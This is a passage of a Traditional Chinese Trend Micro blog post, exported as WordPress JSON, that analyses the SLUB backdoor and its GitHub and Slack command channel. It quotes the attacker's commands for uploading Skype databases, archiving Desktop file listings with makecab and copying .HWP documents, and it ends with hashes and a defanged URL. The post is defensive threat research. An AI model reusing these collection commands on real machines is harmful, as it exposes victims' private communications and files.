C:\\Users\\USER\\Desktop -destinationpath\nC:\\Users\\USER\\doc1$\\<\/p>\n\n\n\n<p>^file,upload,C:\\Users\\USER\\doc1$<\/p>\n\n\n\n<p>\u4ee5\u4e0b\u6307\u4ee4\u6703\u5c07\u4f7f\u7528\u8005\u7684\u300c\u684c\u9762\u300d\u8cc7\u6599\u593e\u5e95\u4e0b\u7684\u6240\u6709\u6a94\u6848\u548c\u76ee\u9304\u6e05\u55ae\u5efa\u7acb\u6210\u4e00\u500b CAB \u6a94\u6848\uff1a<\/p>\n\n\n\n<p>^exec,cd C:\\Users\\USER\n&amp; dir \/s \/b \/a-d C:\\Users\\USER\\Desktop &gt; C:\\Users\\USER\\win12 &amp;\nmakecab \/d CabinetName1=win34 \/f C:\\Users\\USER\\win12$<\/p>\n\n\n\n<p>\u99ed\u5ba2\u5c0d\u65bc Skype \u8edf\u9ad4\u7684\u672c\u6a5f\u7aef\u8cc7\u6599\u5eab\u4f3c\u4e4e\u4e5f\u6709\u8208\u8da3\uff1a<\/p>\n\n\n\n<p>^file,upload\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage-ecs.data$<\/p>\n\n\n\n<p>^file,upload\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data$<\/p>\n\n\n\n<p>^file,upload\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-shm$<\/p>\n\n\n\n<p>^file,upload\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-wal$<\/p>\n\n\n\n<p>\u99ed\u5ba2\u6703\u5c07\u6240\u6709 .HWP \u6a94\u6848 (\u9019\u662f\u97d3\u570b\u67d0\u500b\u6587\u66f8\u8655\u7406\u7a0b\u5f0f\u6240\u7528\u7684\u526f\u6a94\u540d) \u8907\u88fd\u5230\u67d0\u500b\u76ee\u9304\u3002<\/p>\n\n\n\n<p>^exec,copy\nC:\\Users\\USER\\Desktop\\*.hwp C:\\Users\\USER\\oo$<\/p>\n\n\n\n<p>\u99ed\u5ba2\u5f88\u53ef\u80fd\u6709\u610f\u5c07\u6b64\u76ee\u9304\u532f\u51fa\uff0c\u4f46\u6211\u5011\u537b\u6c92\u6709\u770b\u5230\u76f8\u95dc\u7684\u6307\u4ee4\u3002<\/p>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u6211\u5011\u9084\u7279\u5225\u6ce8\u610f\u5230\u67d0\u500b\u540d\u70ba\u300cNeologic Plus Board\u300d\u7684\u8edf\u9ad4\uff0c\u9019\u4f3c\u4e4e\u662f\u4e00\u500b\u96fb\u5b50\u5e03\u544a\u677f\u7cfb\u7d71\n(BBS) \u7684\u7ba1\u7406\u7a0b\u5f0f\u3002\u99ed\u5ba2\u8490\u96c6\u7684\u67d0\u4e9b\u6a94\u6848\u7576\u4e2d\uff0c\u542b\u6709\u6578\u767e\u500b BBS \u7684\u7db2\u5740\u3002\u6211\u5011\u4e5f\u767c\u73fe\u5927\u591a\u6578\u88ab\u4e0a\u50b3\u81f3 file.io \u7684\u6a94\u6848\u5728\u6211\u5011\u8a66\u5716\u53d6\u5f97\u6642\u90fd\u5df2\u906d\u5230\u522a\u9664\u3002<\/p>\n\n\n\n<p>\u5f9e\u99ed\u5ba2\u6240\u57f7\u884c\u7684\u6307\u4ee4\u4f86\u770b\uff0c\u6211\u5011\u63a8\u6e2c\u4ed6\u5011\u60f3\u8981\u5c0b\u627e\u4e00\u4e9b\u8ddf\u4eba\u6709\u95dc\u7684\u8cc7\u8a0a\u3002\u99ed\u5ba2\u5e0c\u671b\u4e86\u89e3\u66f4\u591a\u6709\u95dc\u53d7\u5bb3\u8005\u7684\u65e5\u5e38\u901a\u8a0a\u3002\u6240\u4ee5\uff0c\u9664\u4e86\u8490\u96c6\n.HWP \u6a94\u6848\u4e4b\u5916\uff0c\u4ed6\u5011\u6703\u8a66\u5716\u6316\u6398\u4e00\u4e9b Twitter\u3001Skype\u3001KakaoTalk\u3001BBS (\u751a\u81f3\u5176\u4ed6\u901a\u8a0a\u8edf\u9ad4) \u7684\u76f8\u95dc\u60c5\u5831\u3002<\/p>\n\n\n\n<p>\u4ee5\u4e0b\u6642\u9593\u5e8f\u5217\u986f\u793a\u99ed\u5ba2\u7684\u653b\u64ca\u884c\u52d5\u76f8\u7576\u8fc5\u901f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-9.jpg\" alt=\" Figure 9. Timeline of events\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-9.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 9\uff1a\u653b\u64ca\u4e8b\u4ef6\u6642\u9593\u5e8f\u5217\u3002<\/em><\/p>\n\n\n\n<p><strong><em>\u7d50\u8ad6<\/em><\/strong><\/p>\n\n\n\n<p>\u9019\u8d77\u653b\u64ca\u884c\u52d5\u6700\u4ee4\u4eba\u73a9\u5473\u7684\u4e00\u9ede\u6216\u8a31\u662f\u6b79\u5f92\u4f7f\u7528\u4e86\u4e09\u7a2e\u4e0d\u540c\u7684\u901a\u8a0a\u5e73\u53f0\uff0c\u5206\u5225\u7528\u4f86\uff1a\u767c\u9001\u6307\u4ee4\u3001\u63a5\u6536\u7d50\u679c\u3001\u8490\u96c6\u6a94\u6848\u3002<\/p>\n\n\n\n<p>\u6211\u5011\u6709\u76f8\u7576\u7684\u628a\u63e1\u8a8d\u70ba\u9019\u61c9\u8a72\u662f\u4e00\u8d77\u91dd\u5c0d\u6027\u653b\u64ca\u7684\u4e00\u74b0\u3002\u81f3\u76ee\u524d\u70ba\u6b62\uff0c\u6211\u5011\u5c1a\u672a\u767c\u73fe\u8207\u6b64\u76f8\u95dc\u7684\u653b\u64ca\uff0c\u4e5f\u6c92\u6709\u5728\u5176\u4ed6\u5730\u65b9\u770b\u5230\u9019\u500b\u5ba2\u88fd\u5316\u5f8c\u9580\u7a0b\u5f0f\u3002\u6211\u5011\u4e5f\u8a66\u5716\u641c\u5c0b\u985e\u4f3c\u7684\u60e1\u610f\u7a0b\u5f0f\u6a23\u672c\uff0c\u4f46\u81f3\u4eca\u4ecd\u672a\u767c\u73fe\uff0c\u9019\u5f88\u53ef\u80fd\u610f\u5473\u8457\uff0c\u60e1\u610f\u7a0b\u5f0f\u662f\u7531\u6b79\u5f92\u6240\u81ea\u884c\u958b\u767c\uff0c\u6216\u8005\u662f\u7531\u5176\u4ed6\u99ed\u5ba2\u79c1\u4e0b\u63d0\u4f9b\uff0c\u4e26\u672a\u516c\u958b\u6d41\u50b3\u3002<\/p>\n\n\n\n<p>\u5f9e\u6b79\u5f92\u6240\u57f7\u884c\u7684\u6307\u4ee4\u53ef\u4ee5\u770b\u51fa\u6b79\u5f92\u5c0d\u500b\u4eba\u901a\u8a0a\u76f8\u7576\u611f\u5230\u8208\u8da3\uff0c\u5c24\u5176\u662f\u5404\u7a2e\u901a\u8a0a\u8edf\u9ad4\uff0c\u9019\u61c9\u8a72\u662f\u70ba\u4e86\u9032\u4e00\u6b65\u4e86\u89e3\u53d7\u5bb3\u7684\u4f7f\u7528\u8005\u3002<\/p>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u5f9e\u653b\u64ca\u624b\u6cd5\u4f86\u770b\uff0c\u99ed\u5ba2\u4f3c\u4e4e\u4e5f\u662f\u5c08\u696d\u4eba\u58eb\u3002\u7531\u65bc\u4ed6\u5011\u53ea\u7528\u5230\u4e00\u4e9b\u516c\u958b\u7684\u901a\u8a0a\u670d\u52d9\uff0c\u56e0\u6b64\u5b8c\u5168\u4e0d\u9808\u8a3b\u518a\u4efb\u4f55\u7db2\u57df\u6216\u53ef\u80fd\u7559\u4e0b\u4efb\u4f55\u75d5\u8de1\u7684\u6771\u897f\u3002\u800c\u4e14\u6211\u5011\u5728\u8abf\u67e5\u904e\u7a0b\u7576\u4e2d\u767c\u73fe\u7684\u5e7e\u500b\u96fb\u5b50\u90f5\u4ef6\u5730\u5740\u4e5f\u90fd\u662f\u4f7f\u7528\u4e00\u4e9b\u5783\u573e\u90f5\u4ef6\u7cfb\u7d71\uff0c\u56e0\u6b64\u4e0d\u6703\u7559\u4e0b\u75d5\u8de1\u3002\u6700\u5f8c\uff0c\u6b79\u5f92\u9078\u64c7\u8a2d\u7f6e\u6c34\u5751\u5f0f\u653b\u64ca\u7684\u7db2\u7ad9\uff0c\u5176\u5438\u5f15\u7684\u5c0d\u8c61\u61c9\u8a72\u662f\u4e00\u4e9b\u5c0d\u653f\u6cbb\u6709\u8208\u8da3\u7684\u4eba\uff0c\u9019\u6216\u8a31\u53ef\u4ee5\u8b93\u6211\u5927\u81f4\u4e86\u89e3\u99ed\u5ba2\u60f3\u8981\u653b\u64ca\u7684\u65cf\u7fa4\u3002<\/p>\n\n\n\n<p>\u5728\u6b64\u6211\u5011\u8981\u7279\u5225\u611f\u8b1d&nbsp; Github \u7684\nSIRT \u548c&nbsp; Slack \u7684\u8cc7\u5b89\u5718\u968a\u8fc5\u901f\u5c07\u76f8\u95dc\u6a94\u6848\u79fb\u9664\uff0c\u9019\u7b49\u65bc\u5207\u65b7\u4e86\u6b79\u5f92\u8207\u5176\u60e1\u610f\u7a0b\u5f0f\u4e4b\u9593\u7684\u901a\u8a0a\u3002<\/p>\n\n\n\n<p>\u6b64\u5916\uff0c\u91dd\u5c0d\u9019\u8d77\u4e8b\u4ef6\uff0cSlack \u4e5f\u767c\u51fa\u4ee5\u4e0b\u56de\u61c9\uff1a<\/p>\n\n\n\n<p><em>\u5982\u8da8\u52e2\u79d1\u6280\u5728\u5176\u8cbc\u6587\u4e2d\u6240\u6307\u51fa\uff0c\u4ed6\u5011\u6700\u8fd1\u767c\u73fe\u6709\u4eba\u5229\u7528\u60e1\u610f\u7a0b\u5f0f\u5165\u4fb5\u4e86\u4ed6\u4eba\u7684\u96fb\u8166\uff0c\u4e26\u4e14\u901a\u77e5\u6211\u5011\u6709\u67d0\u500b Slack \u5de5\u4f5c\u7a7a\u9593\u4e5f\u727d\u6d89\u5176\u4e2d\u3002\u6211\u5011\u7acb\u5373\u8457\u624b\u8abf\u67e5\u4e26\u95dc\u9589\u4e86\u9055\u53cd\u6211\u5011\u670d\u52d9\u689d\u6b3e\u7684\u5de5\u4f5c\u7a7a\u9593\uff0c\u4e26\u78ba\u8a8d\nSlack \u5728\u6b64\u4e8b\u4ef6\u7576\u4e2d\u4e26\u672a\u906d\u5230\u4efb\u4f55\u5165\u4fb5\u3002\u6211\u5011\u4e00\u5411\u7aed\u529b\u907f\u514d\u6211\u5011\u7684\u5e73\u53f0\u906d\u5230\u6feb\u7528\uff0c\u540c\u6642\u5c0d\u65bc\u9055\u53cd\u6211\u5011<\/em><a href=\"https:\/\/slack.com\/terms-of-service\"><em>\u670d\u52d9\u689d\u6b3e<\/em><\/a><em>\u7684\u4efb\u4f55\u60c5\u6cc1\u6211\u5011\u90fd\u5c07\u63a1\u53d6\u884c\u52d5\u3002<\/em><\/p>\n\n\n\n<p><strong><em>\u5165\u4fb5\u6307\u6a19 (IoC)\uff1a<\/em><\/strong><\/p>\n\n\n\n<ul><li>3ba00114d0ae766cf77edcdcc953ec6ee7527181968c02d4ffc36b9f89c4ebc7\n(Trojan.Win32.CVE20151701.E)<\/li><li>43221eb160733ea694b4fdda70e7eab4a86d59c5f9749fd2f9b71783e5da6dd7\n(Backdoor.Win32.SLUB.A)<\/li><\/ul>\n\n\n\n<p><strong><em>\u7db2\u5740\uff1a<\/em><\/strong><\/p>\n\n\n\n<ul><li>hxxps:\/\/gist.github[.]com\/kancc14522\/626a3a68a2cc2a91c1ece1eed7610c8a<\/li><\/ul>\n\n\n\n<p>\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/new-slub-backdoor-uses-github-communicates-via-slack\/\">New SLUB Backdoor Uses GitHub, Communicates via Slack<\/a> \u4f5c\u8005\uff1aCedric Pernet\u3001Daniel Lunghi\u3001Jaromir Horejsi \u8207 Joseph C. Chen<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6700\u8fd1\u8da8\u52e2\u79d1\u6280\u9047\u5230\u4e86\u4e00\u500b\u5728\u5404\u65b9\u9762\u90fd\u4ee4\u6211\u5011\u8a1d\u7570\u7684\u672a\u77e5\u60e1\u610f\u7a0b\u5f0f\u3002\u9996\u5148\uff0c\u6211\u5011\u767c\u73fe\u5b83\u662f\u7d93\u7531\u6c34\u5751\u5f0f\u653b\u64ca\u4f86\u6563\u5e03\uff0c\u8981\u4f7f\u7528\u9019\u9805\u6563 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[4126],"tags":[983],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/59923"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59923"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/59923\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59923"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59923"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}